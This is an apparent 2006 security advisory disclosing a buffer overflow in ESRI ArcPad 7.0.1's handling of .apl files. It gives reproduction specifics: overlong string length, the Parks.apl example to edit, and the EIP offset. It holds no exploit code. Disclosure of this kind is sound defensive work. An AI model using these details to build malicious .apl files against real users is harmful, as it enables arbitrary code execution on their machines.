Security Advisory B009 - ArcPad 7.0.1 .apl File Processing Buffer Overflow Lets Remote User Execute Arbitrary Code
==================

Release Date: November 5 2006

Impact: A remote user can cause arbitrary code to be executed on a target computer when the target user opens a malicious .apl file. The code will run with the priviliges of the target user.

Vendor URL: http://www.esri.com/

Vulnerable Versions: Tested on v7.0.1, previous versions probably vulnerable as well.

Description:
ESRI ArcPad 7 is software for mobile GIS and field mapping applications using handheld and mobile devices. By default, .apl files are not automatically opened with ArcPad. However, .apm files are, and these files can link to .apl files. An unchecked buffer in the way ArcPad 7.0.1 processes .apl files allows a remote user to take control over EIP, and thus execute arbitrary code with the prviliges of the target user.

The buffer overflow occurs when a long string is supplied inside an <image></image> tag. A 13383 bytes long string was used while testing. The easiest way to reconstruct this bug is probably by taking the example “Redlands” provided with the ArcPad installation, edit Parks.apl and add about 11800 bytes to the string that is already there. EIP is located at position 2311 in the string.

Solution/Status:
Vendor has been contacted multiple times but never responded. No patch available yet.